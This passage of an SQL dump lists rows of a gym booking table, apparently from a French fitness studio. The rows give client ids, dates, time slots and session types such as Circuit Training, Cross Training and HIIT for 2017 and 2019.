(10055, 26, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10056, 280, 'CTR', '2017-07-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10057, 280, 'CTR', '2017-07-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10058, 230, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10059, 230, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10060, 279, 'CTR', '2017-07-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(10061, 92, 'CTR', '2017-07-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(10062, 193, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10063, 193, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10068, 80, 'CTR', '2017-07-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10069, 48, 'CTR', '2017-07-05', '18h15', '18h45', 'Circuit Training'),
(10070, 26, 'CTR', '2017-07-05', '18h15', '18h45', 'Circuit Training'),
(10071, 286, 'CTR', '2017-07-05', '18h15', '18h45', 'Circuit Training'),
(10072, 290, 'CTR', '2017-07-05', '18h15', '18h45', 'Circuit Training'),
(10073, 287, 'CTR', '2017-07-05', '18h15', '18h45', 'Circuit Training'),
(10074, 285, 'CTR', '2017-07-05', '18h15', '18h45', 'Circuit Training'),
(10086, 287, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10076, 132, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10077, 132, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10078, 286, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10079, 286, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10080, 285, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10081, 285, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10082, 26, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10083, 26, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10084, 290, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10085, 290, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10087, 287, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10088, 48, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10089, 80, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10090, 205, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10091, 80, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10092, 278, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10093, 278, 'CTR', '2017-07-12', '19h ', '19h30', 'Circuit training'),
(10105, 279, 'CTR', '2017-07-17', '18h15', '19h00', 'Circuit Training'),
(10095, 92, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10097, 180, 'CTR', '2017-07-12', '19h ', '19h30', 'Circuit training'),
(10098, 294, 'CTR', '2017-07-12', '19h ', '19h30', 'Circuit training'),
(10104, 132, 'CTR', '2017-07-19', '18h15', '18h45', 'Circuit Training'),
(10100, 80, 'CTR', '2017-07-12', '19h ', '19h30', 'Circuit training'),
(10101, 48, 'CTR', '2017-07-12', '19h ', '19h30', 'Circuit training'),
(10102, 31, 'CTR', '2017-07-12', '19h ', '19h30', 'Circuit training'),
(10106, 48, 'CTR', '2017-07-19', '18h15', '18h45', 'Circuit Training'),
(10107, 48, 'CTR', '2017-07-19', '19h ', '19h30', 'Circuit training'),
(10108, 31, 'CTR', '2017-07-19', '18h15', '18h45', 'Circuit Training'),
(10109, 31, 'CTR', '2017-07-19', '19h ', '19h30', 'Circuit training'),
(10110, 210, 'CTR', '2017-07-19', '19h ', '19h30', 'Circuit training'),
(10111, 205, 'CTR', '2017-07-19', '18h15', '18h45', 'Circuit Training'),
(10112, 205, 'CTR', '2017-07-19', '19h ', '19h30', 'Circuit training'),
(10113, 180, 'CTR', '2017-07-19', '18h15', '18h45', 'Circuit Training'),
(10114, 132, 'CTR', '2017-07-19', '19h ', '19h30', 'Circuit training'),
(10124, 294, 'CTR', '2017-07-19', '19h ', '19h30', 'Circuit training'),
(10144, 279, 'CTR', '2017-08-02', '18h15', '18h45', 'Circuit Training'),
(10145, 48, 'CTR', '2017-07-26', '18h15', '18h45', 'Circuit Training'),
(14735, 375, 'CTR', '2019-03-28', '18h30', '19h30', 'Circuit Training'),
(14736, 381, 'CTR', '2019-03-28', '19h30', '20h30', 'Circuit Training'),
(14737, 381, 'CTR', '2019-03-28', '20h30', '21h30', 'Circuit Training'),
(14793, 31, 'CTR', '2019-04-03', '18h00', '19h00', 'Circuit Training'),
(14792, 395, 'CTR', '2019-04-03', '18h00', '19h00', 'Circuit Training'),
(14740, 378, 'CTR', '2019-03-28', '18h30', '19h30', 'Circuit Training'),
(14741, 387, 'CTR', '2019-03-28', '20h30', '21h30', 'Circuit Training'),
(14742, 394, 'CTR', '2019-03-28', '20h30', '21h30', 'Circuit Training'),
(14743, 392, 'CTR', '2019-03-28', '20h30', '21h30', 'Circuit Training'),
(14744, 388, 'CTR', '2019-03-28', '20h30', '21h30', 'Circuit Training'),
(14745, 386, 'CTR', '2019-03-28', '20h30', '21h30', 'Circuit Training'),
(14746, 393, 'CTR', '2019-03-28', '18h30', '19h30', 'Circuit Training'),
(14747, 371, 'CTR', '2019-04-04', '18h30', '19h30', 'Circuit Training'),
(14748, 370, 'CTR', '2019-04-04', '18h30', '19h30', 'Circuit Training'),
(14749, 294, 'CTR', '2019-03-28', '18h30', '19h30', 'Circuit Training'),
(14750, 399, 'CTR', '2019-03-28', '18h30', '19h30', 'Circuit Training'),
(14751, 367, 'CTR', '2019-03-28', '18h30', '19h30', 'Circuit Training'),
(14752, 344, 'CTR', '2019-03-27', '18h00', '19h00', 'Circuit Training'),
(14753, 344, 'CTR', '2019-03-27', '19h00', '20h00', 'Circuit Training'),
(14754, 344, 'CTR', '2019-04-01', '18h00', '19h00', 'Cross Training'),
(14755, 31, 'CTR', '2019-03-27', '18h00', '19h00', 'Circuit Training'),
(14756, 398, 'CTR', '2019-04-01', '18h00', '19h00', 'Cross Training'),
(14757, 397, 'CTR', '2019-04-01', '18h00', '19h00', 'Cross Training'),
(14758, 138, 'CTR', '2019-04-01', '18h00', '19h00', 'Cross Training'),
(14759, 231, 'CTR', '2019-04-01', '18h00', '19h00', 'Cross Training'),
(14760, 255, 'CTR', '2019-04-01', '18h00', '19h00', 'Cross Training'),
(14841, 397, 'CTR', '2019-04-08', '18h00', '19h00', 'Cross Training'),
(14763, 132, 'CTR', '2019-04-01', '19h00', '20h00', 'Circuit Training'),
(14764, 230, 'CTR', '2019-04-01', '19h00', '20h00', 'Circuit Training'),
(14790, 193, 'CTR', '2019-04-08', '19h00', '20h00', 'Circuit Training'),
(14768, 231, 'CTR', '2019-03-27', '18h00', '19h00', 'Circuit Training'),
(14769, 126, 'CTR', '2019-03-27', '18h00', '19h00', 'Circuit Training'),
(14770, 80, 'CTR', '2019-03-27', '18h00', '19h00', 'Circuit Training'),
(14771, 394, 'CTR', '2019-03-27', '18h00', '19h00', 'Circuit Training'),
(14772, 392, 'CTR', '2019-03-27', '18h00', '19h00', 'Circuit Training'),
(14773, 205, 'CTR', '2019-03-27', '18h00', '19h00', 'Circuit Training'),
(14774, 395, 'CTR', '2019-03-27', '18h00', '19h00', 'Circuit Training'),
(14775, 173, 'CTR', '2019-03-27', '19h00', '20h00', 'Circuit Training'),
(14782, 180, 'CTR', '2019-03-27', '20h00', '21h00', 'Cross Training'),
(14777, 247, 'CTR', '2019-03-27', '19h00', '20h00', 'Circuit Training'),
(14778, 310, 'CTR', '2019-03-27', '19h00', '20h00', 'Circuit Training'),
(14779, 348, 'CTR', '2019-03-27', '19h00', '20h00', 'Circuit Training'),
(14780, 348, 'CTR', '2019-03-27', '19h00', '20h00', 'Circuit Training'),
(14781, 230, 'CTR', '2019-03-27', '19h00', '20h00', 'Circuit Training'),
(14783, 385, 'CTR', '2019-03-27', '18h00', '19h00', 'Circuit Training'),
(14784, 165, 'CTR', '2019-03-27', '20h00', '21h00', 'Cross Training'),
(14786, 90, 'CTR', '2019-03-27', '20h00', '21h00', 'Cross Training'),
(14787, 60, 'CTR', '2019-03-27', '20h00', '21h00', 'Cross Training'),
(14788, 383, 'CTR', '2019-03-27', '20h00', '21h00', 'Cross Training'),
(14789, 103, 'CTR', '2019-03-27', '19h00', '20h00', 'Circuit Training'),
(14791, 80, 'CTR', '2019-03-28', '18h30', '19h30', 'Circuit Training'),
(14794, 138, 'CTR', '2019-04-03', '18h00', '19h00', 'Circuit Training'),
(14795, 392, 'CTR', '2019-04-03', '18h00', '19h00', 'Circuit Training'),
(14796, 394, 'CTR', '2019-04-03', '18h00', '19h00', 'Circuit Training'),
(14797, 80, 'CTR', '2019-04-03', '18h00', '19h00', 'Circuit Training'),
(14798, 126, 'CTR', '2019-04-03', '18h00', '19h00', 'Circuit Training'),
(14799, 231, 'CTR', '2019-04-03', '18h00', '19h00', 'Circuit Training'),
(14800, 177, 'CTR', '2019-04-03', '18h00', '19h00', 'Circuit Training'),
(14801, 393, 'CTR', '2019-04-18', '18h30', '19h30', 'Circuit Training'),
(14802, 132, 'CTR', '2019-04-11', '18h30', '19h30', 'Circuit Training'),
(14803, 401, 'CTR', '2019-04-03', '19h00', '20h00', 'Circuit Training'),
(14804, 173, 'CTR', '2019-04-03', '19h00', '20h00', 'Circuit Training'),
(14805, 247, 'CTR', '2019-04-03', '19h00', '20h00', 'Circuit Training'),
(14806, 310, 'CTR', '2019-04-03', '19h00', '20h00', 'Circuit Training'),
(14807, 230, 'CTR', '2019-04-03', '19h00', '20h00', 'Circuit Training'),
(14808, 348, 'CTR', '2019-04-03', '19h00', '20h00', 'Circuit Training'),
(14809, 348, 'CTR', '2019-04-03', '19h00', '20h00', 'Circuit Training'),
(14810, 375, 'CTR', '2019-04-04', '18h30', '19h30', 'Circuit Training'),
(14811, 375, 'CTR', '2019-04-04', '18h30', '19h30', 'Circuit Training'),
(14812, 383, 'CTR', '2019-04-03', '20h00', '21h00', 'Cross Training'),
(14813, 132, 'CTR', '2019-04-03', '20h00', '21h00', 'Cross Training'),
(14814, 381, 'CTR', '2019-04-04', '19h30', '20h30', 'Circuit Training'),
(14815, 165, 'CTR', '2019-04-03', '20h00', '21h00', 'Cross Training'),
(14816, 381, 'CTR', '2019-04-04', '20h30', '21h30', 'Circuit Training'),
(14817, 180, 'CTR', '2019-04-03', '20h00', '21h00', 'Cross Training'),
(15343, 410, 'CTR', '2019-06-06', '20h30', '21h30', 'Circuit Training'),
(14819, 379, 'CTR', '2019-04-04', '19h30', '20h30', 'Circuit Training'),
(14820, 90, 'CTR', '2019-04-03', '20h00', '21h00', 'Cross Training'),
(14821, 90, 'CTR', '2019-04-03', '20h00', '21h00', 'Cross Training'),
(14822, 380, 'CTR', '2019-04-04', '19h30', '20h30', 'Circuit Training'),
(14823, 60, 'CTR', '2019-04-03', '20h00', '21h00', 'Cross Training'),
(14824, 399, 'CTR', '2019-04-04', '18h30', '19h30', 'Circuit Training'),
(14825, 378, 'CTR', '2019-04-04', '18h30', '19h30', 'Circuit Training'),
(14826, 387, 'CTR', '2019-04-04', '20h30', '21h30', 'Circuit Training'),
(14827, 386, 'CTR', '2019-04-04', '20h30', '21h30', 'Circuit Training'),
(14828, 388, 'CTR', '2019-04-04', '20h30', '21h30', 'Circuit Training'),
(14829, 294, 'CTR', '2019-04-04', '18h30', '19h30', 'Circuit Training'),
(14837, 392, 'CTR', '2019-04-04', '19h30', '20h30', 'Circuit Training'),
(14831, 394, 'CTR', '2019-04-04', '19h30', '20h30', 'Circuit Training'),
(14832, 80, 'CTR', '2019-04-04', '18h30', '19h30', 'Circuit Training'),
(14833, 367, 'CTR', '2019-04-04', '18h30', '19h30', 'Circuit Training'),
(14834, 344, 'CTR', '2019-04-03', '20h00', '21h00', 'Cross Training'),
(14835, 397, 'CTR', '2019-04-03', '19h00', '20h00', 'Circuit Training'),
(14836, 80, 'CTR', '2019-04-11', '18h30', '19h30', 'Circuit Training'),
(14838, 365, 'CTR', '2019-04-01', '19h00', '20h00', 'Circuit Training'),
(14839, 365, 'CTR', '2019-04-01', '19h00', '20h00', 'Circuit Training'),
(14840, 351, 'CTR', '2019-04-01', '19h00', '20h00', 'Circuit Training'),
(14842, 398, 'CTR', '2019-04-08', '18h00', '19h00', 'Cross Training'),
(14843, 231, 'CTR', '2019-04-08', '18h00', '19h00', 'Cross Training'),
(14844, 255, 'CTR', '2019-04-08', '18h00', '19h00', 'Cross Training'),
(14845, 395, 'CTR', '2019-04-08', '18h00', '19h00', 'Cross Training'),
(14846, 138, 'CTR', '2019-04-08', '18h00', '19h00', 'Cross Training'),
(14847, 351, 'CTR', '2019-04-08', '19h00', '20h00', 'Circuit Training'),
(14848, 350, 'CTR', '2019-04-08', '19h00', '20h00', 'Circuit Training'),
(14849, 230, 'CTR', '2019-04-08', '19h00', '20h00', 'Circuit Training'),
(14850, 132, 'CTR', '2019-04-08', '19h00', '20h00', 'Circuit Training'),
(14879, 304, 'CTR', '2019-04-08', '18h00', '19h00', 'Cross Training'),
(14878, 138, 'CTR', '2019-04-10', '18h00', '19h00', 'Circuit Training'),
(14853, 339, 'CTR', '2019-04-08', '19h00', '20h00', 'Circuit Training'),
(14958, 80, 'CTR', '2019-04-15', '18h00', '19h00', 'Cross Training'),
(14916, 247, 'CTR', '2019-04-10', '19h00', '20h00', 'Circuit Training'),
(14917, 173, 'CTR', '2019-04-10', '19h00', '20h00', 'Circuit Training'),
(14860, 367, 'CTR', '2019-04-25', '18h30', '19h30', 'Circuit Training'),
(14861, 371, 'CTR', '2019-04-18', '18h30', '19h30', 'Circuit Training'),
(15012, 344, 'CTR', '2019-04-24', '18h00', '19h00', 'Circuit Training'),
(14863, 367, 'CTR', '2019-04-17', '19h00', '20h00', 'Circuit Training'),
(14864, 344, 'CTR', '2019-04-17', '20h00', '21h00', 'Cross Training'),
(14865, 386, 'CTR', '2019-04-17', '20h00', '21h00', 'Cross Training'),
(14866, 386, 'CTR', '2019-04-18', '20h30', '21h30', 'Circuit Training'),
(14867, 375, 'CTR', '2019-04-11', '18h30', '19h30', 'Circuit Training'),
(14868, 375, 'CTR', '2019-04-11', '18h30', '19h30', 'Circuit Training'),
(14869, 381, 'CTR', '2019-04-11', '19h30', '20h30', 'Circuit Training'),
(14870, 379, 'CTR', '2019-04-11', '19h30', '20h30', 'Circuit Training'),
(14871, 380, 'CTR', '2019-04-11', '19h30', '20h30', 'Circuit Training'),
(14872, 399, 'CTR', '2019-04-11', '18h30', '19h30', 'Circuit Training'),
(14873, 378, 'CTR', '2019-04-11', '18h30', '19h30', 'Circuit Training'),
(14971, 294, 'CTR', '2019-05-02', '18h30', '19h30', 'Circuit Training'),
(14875, 80, 'CTR', '2019-04-11', '18h30', '19h30', 'Circuit Training'),
(14876, 388, 'CTR', '2019-04-11', '19h30', '20h30', 'Circuit Training'),
(14877, 80, 'CTR', '2019-04-18', '20h30', '21h30', 'Circuit Training'),
(14880, 193, 'CTR', '2019-04-15', '19h00', '20h00', 'Circuit Training'),
(14881, 80, 'CTR', '2019-04-10', '19h00', '20h00', 'Circuit Training'),
(14882, 80, 'CTR', '2019-04-10', '19h00', '20h00', 'Circuit Training'),
(14883, 231, 'CTR', '2019-04-10', '18h00', '19h00', 'Circuit Training'),
(14884, 132, 'CTR', '2019-04-10', '20h00', '21h00', 'Cross Training'),
(14885, 180, 'CTR', '2019-04-10', '20h00', '21h00', 'Cross Training'),
(14886, 383, 'CTR', '2019-04-10', '20h00', '21h00', 'Cross Training'),
(14919, 138, 'CTR', '2019-04-17', '18h00', '19h00', 'Circuit Training'),
(14918, 92, 'CTR', '2019-04-17', '18h00', '19h00', 'Circuit Training'),
(14889, 401, 'CTR', '2019-04-10', '19h00', '20h00', 'Circuit Training'),
(14890, 310, 'CTR', '2019-04-10', '19h00', '20h00', 'Circuit Training'),
(14891, 348, 'CTR', '2019-04-10', '19h00', '20h00', 'Circuit Training'),
(14892, 348, 'CTR', '2019-04-10', '19h00', '20h00', 'Circuit Training'),
(15034, 316, 'CTR', '2019-04-24', '18h00', '19h00', 'Circuit Training'),
(15046, 375, 'CTR', '2019-05-02', '18h30', '19h30', 'Circuit Training'),
(14895, 205, 'CTR', '2019-04-10', '18h00', '19h00', 'Circuit Training');
INSERT INTO `reservation_reservation` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(14897, 395, 'CTR', '2019-04-10', '18h00', '19h00', 'Circuit Training'),
(14960, 397, 'CTR', '2019-04-29', '18h00', '19h00', 'Cross Training'),
(14899, 138, 'CTR', '2019-04-15', '18h00', '19h00', 'Cross Training'),
(14900, 397, 'CTR', '2019-04-15', '18h00', '19h00', 'Cross Training'),
(14901, 398, 'CTR', '2019-04-15', '18h00', '19h00', 'Cross Training'),
(14902, 350, 'CTR', '2019-04-15', '19h00', '20h00', 'Circuit Training'),
(14903, 132, 'CTR', '2019-04-15', '19h00', '20h00', 'Circuit Training'),
(14904, 230, 'CTR', '2019-04-15', '19h00', '20h00', 'Circuit Training'),
(14905, 351, 'CTR', '2019-04-15', '19h00', '20h00', 'Circuit Training'),
(14906, 397, 'CTR', '2019-04-10', '19h00', '20h00', 'Circuit Training'),
(14907, 339, 'CTR', '2019-04-10', '19h00', '20h00', 'Circuit Training'),
(14908, 230, 'CTR', '2019-04-10', '19h00', '20h00', 'Circuit Training'),
(14909, 255, 'CTR', '2019-04-29', '18h00', '19h00', 'Cross Training'),
(14910, 92, 'CTR', '2019-04-10', '20h00', '21h00', 'Cross Training'),
(14913, 60, 'CTR', '2019-04-10', '20h00', '21h00', 'Cross Training'),
(14914, 60, 'CTR', '2019-04-10', '20h00', '21h00', 'Cross Training'),
(14920, 126, 'CTR', '2019-04-17', '18h00', '19h00', 'Circuit Training'),
(14921, 126, 'CTR', '2019-04-17', '18h00', '19h00', 'Circuit Training'),
(14922, 80, 'CTR', '2019-04-17', '18h00', '19h00', 'Circuit Training'),
(14970, 294, 'CTR', '2019-04-25', '18h30', '19h30', 'Circuit Training'),
(14924, 173, 'CTR', '2019-04-17', '19h00', '20h00', 'Circuit Training'),
(14925, 230, 'CTR', '2019-04-17', '19h00', '20h00', 'Circuit Training'),
(14926, 397, 'CTR', '2019-04-17', '19h00', '20h00', 'Circuit Training'),
(14927, 402, 'CTR', '2019-04-17', '19h00', '20h00', 'Circuit Training'),
(14928, 403, 'CTR', '2019-04-17', '19h00', '20h00', 'Circuit Training'),
(14929, 180, 'CTR', '2019-04-17', '20h00', '21h00', 'Cross Training'),
(14973, 344, 'CTR', '2019-04-17', '19h00', '20h00', 'Circuit Training'),
(15050, 378, 'CTR', '2019-05-02', '18h30', '19h30', 'Circuit Training'),
(14932, 60, 'CTR', '2019-04-17', '20h00', '21h00', 'Cross Training'),
(14933, 60, 'CTR', '2019-04-17', '20h00', '21h00', 'Cross Training'),
(14976, 90, 'CTR', '2019-04-17', '20h00', '21h00', 'Cross Training'),
(14935, 80, 'CTR', '2019-04-11', '19h30', '20h30', 'Circuit Training'),
(14936, 80, 'CTR', '2019-04-11', '19h30', '20h30', 'Circuit Training'),
(14937, 80, 'CTR', '2019-04-11', '19h30', '20h30', 'Circuit Training'),
(14938, 80, 'CTR', '2019-04-11', '19h30', '20h30', 'Circuit Training'),
(14939, 80, 'CTR', '2019-04-11', '19h30', '20h30', 'Circuit Training'),
(14940, 375, 'CTR', '2019-04-18', '18h30', '19h30', 'Circuit Training'),
(14941, 375, 'CTR', '2019-04-18', '18h30', '19h30', 'Circuit Training'),
(14942, 379, 'CTR', '2019-04-18', '19h30', '20h30', 'Circuit Training'),
(14943, 381, 'CTR', '2019-04-18', '20h30', '21h30', 'Circuit Training'),
(14944, 399, 'CTR', '2019-04-18', '18h30', '19h30', 'Circuit Training'),
(14945, 132, 'CTR', '2019-04-18', '18h30', '19h30', 'Circuit Training'),
(14946, 80, 'CTR', '2019-04-18', '18h30', '19h30', 'Circuit Training'),
(14947, 80, 'CTR', '2019-04-18', '18h30', '19h30', 'Circuit Training'),
(14948, 378, 'CTR', '2019-04-18', '18h30', '19h30', 'Circuit Training'),
(14949, 381, 'CTR', '2019-04-18', '19h30', '20h30', 'Circuit Training'),
(14950, 388, 'CTR', '2019-04-18', '20h30', '21h30', 'Circuit Training'),
(14951, 399, 'CTR', '2019-04-15', '19h00', '20h00', 'Circuit Training'),
(14952, 92, 'CTR', '2019-04-15', '18h00', '19h00', 'Cross Training'),
(15047, 381, 'CTR', '2019-05-02', '19h30', '20h30', 'Circuit Training'),
(14955, 365, 'CTR', '2019-04-15', '19h00', '20h00', 'Circuit Training'),
(14956, 365, 'CTR', '2019-04-15', '19h00', '20h00', 'Circuit Training'),
(14959, 138, 'CTR', '2019-04-29', '18h00', '19h00', 'Cross Training'),
(14961, 398, 'CTR', '2019-04-29', '18h00', '19h00', 'Cross Training'),
(15067, 404, 'CTR', '2019-05-06', '18h00', '19h00', 'Cross Training'),
(14963, 365, 'CTR', '2019-04-29', '19h00', '20h00', 'Circuit Training'),
(15083, 385, 'CTR', '2019-05-01', '18h00', '19h00', 'Circuit Training'),
(15069, 230, 'CTR', '2019-04-29', '18h00', '19h00', 'Cross Training'),
(14966, 351, 'CTR', '2019-04-29', '19h00', '20h00', 'Circuit Training'),
(14967, 350, 'CTR', '2019-04-29', '19h00', '20h00', 'Circuit Training'),
(15048, 381, 'CTR', '2019-05-02', '20h30', '21h30', 'Circuit Training'),
(14969, 385, 'CTR', '2019-04-17', '18h00', '19h00', 'Circuit Training'),
(14974, 394, 'CTR', '2019-04-17', '18h00', '19h00', 'Circuit Training'),
(14975, 392, 'CTR', '2019-04-17', '18h00', '19h00', 'Circuit Training'),
(14977, 90, 'CTR', '2019-04-17', '20h00', '21h00', 'Cross Training'),
(14978, 394, 'CTR', '2019-04-18', '19h30', '20h30', 'Circuit Training'),
(14979, 394, 'CTR', '2019-04-18', '19h30', '20h30', 'Circuit Training'),
(14980, 392, 'CTR', '2019-04-18', '19h30', '20h30', 'Circuit Training'),
(14981, 165, 'CTR', '2019-04-24', '20h00', '21h00', 'Cross Training'),
(14982, 180, 'CTR', '2019-04-24', '20h00', '21h00', 'Cross Training'),
(14983, 383, 'CTR', '2019-04-24', '20h00', '21h00', 'Cross Training'),
(14986, 401, 'CTR', '2019-04-24', '19h00', '20h00', 'Circuit Training'),
(14985, 365, 'CTR', '2019-04-24', '20h00', '21h00', 'Cross Training'),
(14987, 354, 'CTR', '2019-04-18', '19h30', '20h30', 'Circuit Training'),
(14988, 353, 'CTR', '2019-04-18', '19h30', '20h30', 'Circuit Training'),
(14989, 353, 'CTR', '2019-04-18', '19h30', '20h30', 'Circuit Training'),
(14990, 353, 'CTR', '2019-04-18', '19h30', '20h30', 'Circuit Training'),
(14991, 60, 'CTR', '2019-04-24', '20h00', '21h00', 'Cross Training'),
(14992, 344, 'CTR', '2019-04-24', '20h00', '21h00', 'Cross Training'),
(15042, 80, 'CTR', '2019-04-25', '18h30', '19h30', 'Circuit Training'),
(14995, 173, 'CTR', '2019-04-24', '19h00', '20h00', 'Circuit Training'),
(14996, 247, 'CTR', '2019-04-24', '19h00', '20h00', 'Circuit Training'),
(14997, 310, 'CTR', '2019-04-24', '19h00', '20h00', 'Circuit Training'),
(14998, 348, 'CTR', '2019-04-24', '19h00', '20h00', 'Circuit Training'),
(14999, 348, 'CTR', '2019-04-24', '19h00', '20h00', 'Circuit Training'),
(15000, 230, 'CTR', '2019-04-24', '19h00', '20h00', 'Circuit Training'),
(15001, 402, 'CTR', '2019-04-24', '19h00', '20h00', 'Circuit Training'),
(15002, 403, 'CTR', '2019-04-24', '19h00', '20h00', 'Circuit Training'),
(15003, 397, 'CTR', '2019-04-24', '19h00', '20h00', 'Circuit Training'),
(15004, 344, 'CTR', '2019-04-24', '19h00', '20h00', 'Circuit Training'),
(15005, 80, 'CTR', '2019-04-24', '18h00', '19h00', 'Circuit Training'),
(15045, 375, 'CTR', '2019-05-02', '18h30', '19h30', 'Circuit Training'),
(15007, 231, 'CTR', '2019-04-24', '18h00', '19h00', 'Circuit Training'),
(15008, 138, 'CTR', '2019-04-24', '18h00', '19h00', 'Circuit Training'),
(15009, 394, 'CTR', '2019-04-24', '18h00', '19h00', 'Circuit Training'),
(15010, 392, 'CTR', '2019-04-24', '18h00', '19h00', 'Circuit Training'),
(15015, 375, 'CTR', '2019-04-25', '18h30', '19h30', 'Circuit Training'),
(15016, 375, 'CTR', '2019-04-25', '18h30', '19h30', 'Circuit Training'),
(15017, 381, 'CTR', '2019-04-25', '19h30', '20h30', 'Circuit Training'),
(15070, 344, 'CTR', '2019-05-01', '18h00', '19h00', 'Circuit Training'),
(15035, 379, 'CTR', '2019-05-02', '19h30', '20h30', 'Circuit Training'),
(15036, 380, 'CTR', '2019-05-02', '19h30', '20h30', 'Circuit Training'),
(15021, 378, 'CTR', '2019-04-25', '18h30', '19h30', 'Circuit Training'),
(15022, 399, 'CTR', '2019-04-25', '18h30', '19h30', 'Circuit Training'),
(15037, 386, 'CTR', '2019-04-25', '19h30', '20h30', 'Circuit Training'),
(15024, 394, 'CTR', '2019-04-25', '19h30', '20h30', 'Circuit Training'),
(15025, 392, 'CTR', '2019-04-25', '19h30', '20h30', 'Circuit Training'),
(15026, 80, 'CTR', '2019-04-25', '18h30', '19h30', 'Circuit Training'),
(15039, 388, 'CTR', '2019-04-25', '19h30', '20h30', 'Circuit Training'),
(15032, 370, 'CTR', '2019-04-25', '18h30', '19h30', 'Circuit Training'),
(15049, 399, 'CTR', '2019-05-02', '18h30', '19h30', 'Circuit Training'),
(15043, 80, 'CTR', '2019-04-25', '19h30', '20h30', 'Circuit Training'),
(15038, 387, 'CTR', '2019-04-25', '19h30', '20h30', 'Circuit Training'),
(15033, 393, 'CTR', '2019-04-25', '18h30', '19h30', 'Circuit Training'),
(15051, 406, 'CTR', '2019-05-02', '18h30', '19h30', 'Circuit Training'),
(15052, 387, 'CTR', '0000-00-00', '20h30', '21h30', 'Circuit Training'),
(15053, 388, 'CTR', '2019-05-02', '20h30', '21h30', 'Circuit Training'),
(15054, 392, 'CTR', '2019-05-02', '19h30', '20h30', 'Circuit Training'),
(15055, 394, 'CTR', '2019-05-02', '19h30', '20h30', 'Circuit Training'),
(15056, 387, 'CTR', '2019-05-02', '20h30', '21h30', 'Circuit Training'),
(15057, 405, 'CTR', '2019-05-02', '18h30', '19h30', 'Circuit Training'),
(15058, 386, 'CTR', '2019-05-02', '20h30', '21h30', 'Circuit Training'),
(15059, 367, 'CTR', '2019-05-02', '18h30', '19h30', 'Circuit Training'),
(15060, 393, 'CTR', '2019-05-02', '18h30', '19h30', 'Circuit Training'),
(15158, 392, 'CTR', '2019-05-09', '19h30', '20h30', 'Circuit Training'),
(15160, 132, 'CTR', '2019-05-13', '19h00', '20h00', 'Circuit Training'),
(15063, 80, 'CTR', '2019-05-09', '19h30', '20h30', 'Circuit Training'),
(15064, 80, 'CTR', '2019-05-09', '19h30', '20h30', 'Circuit Training'),
(15066, 395, 'CTR', '2019-04-29', '18h00', '19h00', 'Cross Training'),
(15072, 230, 'CTR', '2019-05-06', '19h00', '20h00', 'Circuit Training'),
(15080, 398, 'CTR', '2019-05-06', '18h00', '19h00', 'Cross Training'),
(15074, 255, 'CTR', '2019-05-06', '18h00', '19h00', 'Cross Training'),
(15077, 398, 'CTR', '2019-05-06', '19h00', '20h00', 'Circuit Training'),
(15094, 103, 'CTR', '2019-05-02', '19h30', '20h30', 'Circuit Training'),
(15097, 375, 'CTR', '2019-05-09', '18h30', '19h30', 'Circuit Training'),
(15079, 397, 'CTR', '2019-05-06', '18h00', '19h00', 'Cross Training'),
(15081, 231, 'CTR', '2019-05-06', '18h00', '19h00', 'Cross Training'),
(15082, 316, 'CTR', '2019-05-01', '18h00', '19h00', 'Circuit Training'),
(15084, 138, 'CTR', '2019-05-01', '18h00', '19h00', 'Circuit Training'),
(15085, 403, 'CTR', '2019-05-01', '19h00', '20h00', 'Circuit Training'),
(15086, 230, 'CTR', '2019-05-01', '19h00', '20h00', 'Circuit Training'),
(15087, 173, 'CTR', '2019-05-01', '19h00', '20h00', 'Circuit Training'),
(15088, 401, 'CTR', '2019-05-01', '19h00', '20h00', 'Circuit Training'),
(15089, 383, 'CTR', '2019-05-01', '19h00', '20h00', 'Circuit Training'),
(15090, 180, 'CTR', '2019-05-01', '19h00', '20h00', 'Circuit Training'),
(15091, 339, 'CTR', '2019-05-01', '18h00', '19h00', 'Circuit Training'),
(15092, 231, 'CTR', '2019-05-01', '18h00', '19h00', 'Circuit Training'),
(15093, 365, 'CTR', '2019-05-01', '19h00', '20h00', 'Circuit Training'),
(15095, 351, 'CTR', '2019-05-06', '19h00', '20h00', 'Circuit Training'),
(15096, 350, 'CTR', '2019-05-06', '19h00', '20h00', 'Circuit Training'),
(15098, 375, 'CTR', '2019-05-09', '18h30', '19h30', 'Circuit Training'),
(15099, 381, 'CTR', '2019-05-09', '19h30', '20h30', 'Circuit Training'),
(15100, 381, 'CTR', '2019-05-09', '20h30', '21h30', 'Circuit Training'),
(15101, 379, 'CTR', '2019-05-09', '19h30', '20h30', 'Circuit Training'),
